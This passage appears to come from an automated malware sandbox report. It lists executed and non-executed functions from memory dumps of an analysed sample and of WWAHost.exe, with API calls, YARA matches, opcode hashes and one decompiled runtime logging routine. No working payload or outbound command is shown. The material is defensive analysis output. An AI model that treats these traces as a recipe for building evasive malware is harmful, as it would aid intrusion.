                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 26e5db6552469406aceaa630fb5b840debe71986b89b3f8438d9b15cf8c25c16
                                            • Instruction ID: beca68029f9711ce4b0d9aa005dcd329129edb74905c6565a5262d923b642c9c
                                            • Opcode Fuzzy Hash: 26e5db6552469406aceaa630fb5b840debe71986b89b3f8438d9b15cf8c25c16
                                            • Instruction Fuzzy Hash: 28113CB6600209ABDB14DF89CC85EEB37A9EF88790F158159FE0CA7241D534ED51CBE4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                            • Instruction ID: c56ba0c085939b8c42c795c32c14b578f190c8095243a7543fabada8e08a803b
                                            • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                            • Instruction Fuzzy Hash: 13018431A8022877E720AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00409B23, Relevance: 1.5, APIs: 1, Instructions: 31libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: df6bbcc5408c720e5448587703f7560b19e1f2f1b3a740f2d51d2111de8e08c9
                                            • Instruction ID: 1107b32906c3b872e591800e90cf357500a7370756d81c63248986f9e4593177
                                            • Opcode Fuzzy Hash: df6bbcc5408c720e5448587703f7560b19e1f2f1b3a740f2d51d2111de8e08c9
                                            • Instruction Fuzzy Hash: C8F0A0B5E00109ABCB10DF94EC41F9EB374EF44708F10856AE818AA281EA35EA408B95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004188D3, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: b26e6c4544cf4679d6ec5ff8e31106d68b7f995dd4b0b9d55b089d6eda8d8120
                                            • Instruction ID: 61de823632867882bca4fda273549cd743f0a34a9c5443a36676d2e6d524ca8a
                                            • Opcode Fuzzy Hash: b26e6c4544cf4679d6ec5ff8e31106d68b7f995dd4b0b9d55b089d6eda8d8120
                                            • Instruction Fuzzy Hash: 88E068B411434A4FDB10EE59D8808AB33C4FFC13047104A5BE8488B313C235C85A87B4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418A31, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 0329143a6fdf7fd2661babf6718cfe2836e07095c13e1f104afdeff3fc638950
                                            • Instruction ID: 1eae2e4233780061a3487a89aac1c5c177e5a324470c7ace6cdc3bf70688914e
                                            • Opcode Fuzzy Hash: 0329143a6fdf7fd2661babf6718cfe2836e07095c13e1f104afdeff3fc638950
                                            • Instruction Fuzzy Hash: 20E0EDBA2042586FDB00DF62CD85EE73BA8EF45390F244989FC881B602C534A805CBB4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00409BAB, Relevance: 1.5, APIs: 1, Instructions: 22libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 5a2e2246cf40888f7dabc2aa92904b70bcfa04eabfb718692e5fe030c72a8af0
                                            • Instruction ID: 22051bb269b5b7b14ff913d61f44b31d2615b7424d621259a5511443a7ab7705
                                            • Opcode Fuzzy Hash: 5a2e2246cf40888f7dabc2aa92904b70bcfa04eabfb718692e5fe030c72a8af0
                                            • Instruction Fuzzy Hash: 0EE08670E4410EAFDF10CE94DC41F9DB7B4EB44208F0441A6E918DB2C1E634FA49CB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f8886ef3963531fa287d2e9c0232e1325a41c854095f36b107d210f28f099b97
                                            • Instruction ID: c9bbfb06088726fc56a6e44ac06294ddc0b79786d4ce2e994e0c4d13ca6d18b6
                                            • Opcode Fuzzy Hash: f8886ef3963531fa287d2e9c0232e1325a41c854095f36b107d210f28f099b97
                                            • Instruction Fuzzy Hash: E0B09B729414C5C5E711D760460CB177940F7D0741F16C0B6D1420655A4778C4A1F6B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 00415815, Relevance: 6.4, Strings: 5, Instructions: 100COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: Us$: $er-A$gent$urlmon.dll
                                            • API String ID: 0-1367105278
                                            • Opcode ID: 88c35f93ad5660534ad021a4152f9520d7cf2d312b931c85e7370a7a540ac120
                                            • Instruction ID: f3895f089e2472e04f6b3da9dd3f657dd0385fbcb2b7122b9ad7a9970fc56f46
                                            • Opcode Fuzzy Hash: 88c35f93ad5660534ad021a4152f9520d7cf2d312b931c85e7370a7a540ac120
                                            • Instruction Fuzzy Hash: BD21AC72E05A18DFDB119E50EC017EFF7B4AB96734F14011BE810AB380D62D498287C9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00415818, Relevance: .0, Instructions: 32COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0688672f413c3122458d585b8641d17578fdae274932e745d2cea36d2695beb4
                                            • Instruction ID: 1954c0e896f0d0019df4864f1fcab72444493d5cbcaf0ca0461db457b187c0a0
                                            • Opcode Fuzzy Hash: 0688672f413c3122458d585b8641d17578fdae274932e745d2cea36d2695beb4
                                            • Instruction Fuzzy Hash: EBE0E536E04D95CBDB226D70F8110E9F760E6C76307681B56E4E55A6C0C558449582CC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC98A0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f550fedfae8b4cb810099003c4ebf489e008a1b4cd6c1784aaf8ede2f1ba695a
                                            • Instruction ID: 37f3f88662f29092b32e1743867d7e91371ad93e2be73b6a6a0cabcf398ac441
                                            • Opcode Fuzzy Hash: f550fedfae8b4cb810099003c4ebf489e008a1b4cd6c1784aaf8ede2f1ba695a
                                            • Instruction Fuzzy Hash: C490026235100402D202615944146064049D7D1385F95C067E1814565D96658963F172
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9820, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 41b11fa8b768f2f671b84fd82ad1296c4ca6ca9ce37daeb4c6ad2f17c1efb1c4
                                            • Instruction ID: 8c9bd78965ae26a9c1a40eb922db2e835b78947dd74cb13cdf4081225a0ba381
                                            • Opcode Fuzzy Hash: 41b11fa8b768f2f671b84fd82ad1296c4ca6ca9ce37daeb4c6ad2f17c1efb1c4
                                            • Instruction Fuzzy Hash: 7090027229100402D241715944046064049E7D0381F95C067A0814564E96958A66FAA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BCB040, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0724999edc23bf77af740e378b4cd06abbd3f8dea58c571bcf8cd8641a9324eb
                                            • Instruction ID: 3f6d99c9d5ab2107d3f252240fcb29e906aee90ba93fc0aed5f9ab041824baf9
                                            • Opcode Fuzzy Hash: 0724999edc23bf77af740e378b4cd06abbd3f8dea58c571bcf8cd8641a9324eb
                                            • Instruction Fuzzy Hash: 4D9002A2651140434640B15948044069055E7E1341795C176A0844570C96A88865E2A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC95F0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 04091d660d704cf50d50746a7d56676d8e940f65e4ce6801d79aadeb479e4414
                                            • Instruction ID: e26c52b714ae60443bddd94e9e37b389d09b0636fc44eecc8e273a007a77127b
                                            • Opcode Fuzzy Hash: 04091d660d704cf50d50746a7d56676d8e940f65e4ce6801d79aadeb479e4414
                                            • Instruction Fuzzy Hash: C690027225100802D204615948046864045D7D0341F55C066A6414665EA6A588A1B171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC99D0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eb670e92fa52e0d1630ed477871a5942ee23df1d447d1e889e0143c9e6c1a1ea
                                            • Instruction ID: 8da604d4d255f83e10c320d9f1e44294e5e930ce0af0a376cf181446b44e51ef
                                            • Opcode Fuzzy Hash: eb670e92fa52e0d1630ed477871a5942ee23df1d447d1e889e0143c9e6c1a1ea
                                            • Instruction Fuzzy Hash: F19002A226100042D204615944047064085D7E1341F55C067A2544564CD5698C71A165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BCAD30, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c3cf7145bc47a49b6e83ac7629f42a30c75ad664917955fa6a8963c8f43cb44f
                                            • Instruction ID: 8a394bdc1eb101969ea2d7db52ead975c96ab642d8baa3af6a869bd3dcafc845
                                            • Opcode Fuzzy Hash: c3cf7145bc47a49b6e83ac7629f42a30c75ad664917955fa6a8963c8f43cb44f
                                            • Instruction Fuzzy Hash: A3900272A55000129240715948146468046E7E0781F59C066A0904564C99948A65A3E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9520, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dabb03d9f54a670395ac763e85a07564198a77e3fa4a68ff55d10dd1c6a0a5f7
                                            • Instruction ID: 15e40a5273fadf1bf1e4d950fdfa5c41a15c334152af9ca9bd750db09899d6d2
                                            • Opcode Fuzzy Hash: dabb03d9f54a670395ac763e85a07564198a77e3fa4a68ff55d10dd1c6a0a5f7
                                            • Instruction Fuzzy Hash: 8E9002E2251140924600A2598404B0A8545D7E0341F55C06BE1444570CD5658861E175
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9560, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c4b531e202477f4ec1ef7aa65584c13d0f6a8b190e127920993e50c59aa791c4
                                            • Instruction ID: f95075ed3c91e20a8be4dd35915234c28b050ab1c53e30cee1803494f9889d49
                                            • Opcode Fuzzy Hash: c4b531e202477f4ec1ef7aa65584c13d0f6a8b190e127920993e50c59aa791c4
                                            • Instruction Fuzzy Hash: BB900266271000020245A559060450B4485E7D6391795C06AF18065A0CD6618875A361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9950, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 09d4c4d5a69a101332e3992f80beafbd8b5e33b745dfdd078a00616c7a8b093a
                                            • Instruction ID: 5276fa4fa9064f7ebe356c65866396aa22e2806a9c27f11a9048a2d862e4a33f
                                            • Opcode Fuzzy Hash: 09d4c4d5a69a101332e3992f80beafbd8b5e33b745dfdd078a00616c7a8b093a
                                            • Instruction Fuzzy Hash: 969002A225140403D240655948046074045D7D0342F55C066A2454565E9A698C61B175
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9A80, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fd189fb9a6257bff500d200867cd811deed5df4de0934775b7f589087ad6fec4
                                            • Instruction ID: 45f061aad39df0b80c4f79cb813b06d53ae88aed4752bf95cc2438343640f3c7
                                            • Opcode Fuzzy Hash: fd189fb9a6257bff500d200867cd811deed5df4de0934775b7f589087ad6fec4
                                            • Instruction Fuzzy Hash: 5C90026225144442D24062594804B0F8145D7E1342F95C06EA4546564CD9558865A761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9A10, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2cf56bbcd7f4aee5b9c38ffcfa8d4c30c75b273310b2a02fbccdcd02c07582ac
                                            • Instruction ID: 7ef5d22a9eb9820ac44a98bfb85626a166547a5b7d52e26b799017e8e2889f56
                                            • Opcode Fuzzy Hash: 2cf56bbcd7f4aee5b9c38ffcfa8d4c30c75b273310b2a02fbccdcd02c07582ac
                                            • Instruction Fuzzy Hash: 8690027225140402D200615948087474045D7D0342F55C066A5554565E96A5C8A1B571
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BCA3B0, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23b332ec0855a9c22a90500c4783a15b2946b9d44e81ff139bfe7a08f7ab363b
                                            • Instruction ID: a94ebeb81e530f278a5ee07097239fbd14540555101fd98253402feadbf11769
                                            • Opcode Fuzzy Hash: 23b332ec0855a9c22a90500c4783a15b2946b9d44e81ff139bfe7a08f7ab363b
                                            • Instruction Fuzzy Hash: F290027225144002D2407159844460B9045E7E0341F55C466E0815564C96558866E261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9B00, Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0856e5d6b12ce8fad477715d47435fe447e7a55b1bbaeb8e14aa9208df1b5a2
                                            • Instruction ID: dece7d72c13e779bb5eea0abc9f302f8bcb4b53a541df4cc24f46c0fa714ece7
                                            • Opcode Fuzzy Hash: f0856e5d6b12ce8fad477715d47435fe447e7a55b1bbaeb8e14aa9208df1b5a2
                                            • Instruction Fuzzy Hash: 9A90026229100802D240715984147074046D7D0741F55C066A0414564D96568975B6F1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C1FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 53%
                                            			E00C1FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = L00BCCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				L00C15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return L00C15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                            0x00c1fdda
                                            0x00c1fde2
                                            0x00c1fde5
                                            0x00c1fdec
                                            0x00c1fdfa
                                            0x00c1fdff
                                            0x00c1fe0a
                                            0x00c1fe0f
                                            0x00c1fe17
                                            0x00c1fe1e
                                            0x00c1fe19
                                            0x00c1fe19
                                            0x00c1fe19
                                            0x00c1fe20
                                            0x00c1fe21
                                            0x00c1fe22
                                            0x00c1fe25
                                            0x00c1fe40

                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C1FDFA
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00C1FE01
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00C1FE2B
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                            • API String ID: 885266447-3903918235
                                            • Opcode ID: bf73135a77de30af27919ae459b85d3da89729e42b9c29ef185342976ad38531
                                            • Instruction ID: 0580a5245dc367e63143724c2570830186a9ba557ab5566ca67881ee1dc8d972
                                            • Opcode Fuzzy Hash: bf73135a77de30af27919ae459b85d3da89729e42b9c29ef185342976ad38531
                                            • Instruction Fuzzy Hash: B9F0F632200601BFE6251A55DC03F63BF9BEB86730F244358F628561E1DA62F8A0A6F0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: WWAHost.exe PID: 4388 Parent PID: 3424 WWAHost.exeCOMMON

                                            Executed Functions

                                            Function 005785CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00573BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00573BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0057861D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: d465f0e79990a9686307860cd643e2ba657b093c6715d91f70ebf0b604abdd7c
                                            • Instruction ID: e2f519054d29b91439248fef172eb5ab01b36c2037dbaa28e18cb8065f022bd0
                                            • Opcode Fuzzy Hash: d465f0e79990a9686307860cd643e2ba657b093c6715d91f70ebf0b604abdd7c
                                            • Instruction Fuzzy Hash: 9601F2B2241208ABCB08CF88DC85EEB37ADBF8C314F058248FE0D93241C630E810CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 005785D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00573BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00573BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0057861D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction ID: d921e515a9b5f9702069382f478ec64ca3fdb5c058dc7528da4c7b8d8bead663
                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction Fuzzy Hash: C0F0BDB2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 005786FA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(@=W,?,?,00573D40,00000000,FFFFFFFF), ref: 00578725
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID: @=W
                                            • API String ID: 3535843008-272422971
                                            • Opcode ID: f1713da56357228668222a7f7369ecb50b822e0a152d131dc31635035ac5aeac
                                            • Instruction ID: 068349c63990187b2a6de818c23678e044c441a1fb7f7b2474513d0560fade84
                                            • Opcode Fuzzy Hash: f1713da56357228668222a7f7369ecb50b822e0a152d131dc31635035ac5aeac
                                            • Instruction Fuzzy Hash: AEF05E76200115ABD714EF98EC85EEB77ADFF88310F248559FA5C9B201C631E914CBE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00578680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:W,FFFFFFFF,?,b=W,?,00000000), ref: 005786C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, Offset: 00560000, based on PE: false
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: !:W
                                            • API String ID: 2738559852-375975915
                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction ID: 8c5873f528b06e8ae422903a921f0137727a18b7cd91b8ab72e5f0e581d7728a
                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                            • Instruction Fuzzy Hash: E7F0A4B2200209ABCB18DF89DC85EEB77ADAF8C754F158248BE1D97241D630E811CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00578622, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00573BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00573BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0057861D
                                            Strings
                                            Memory Dump Source
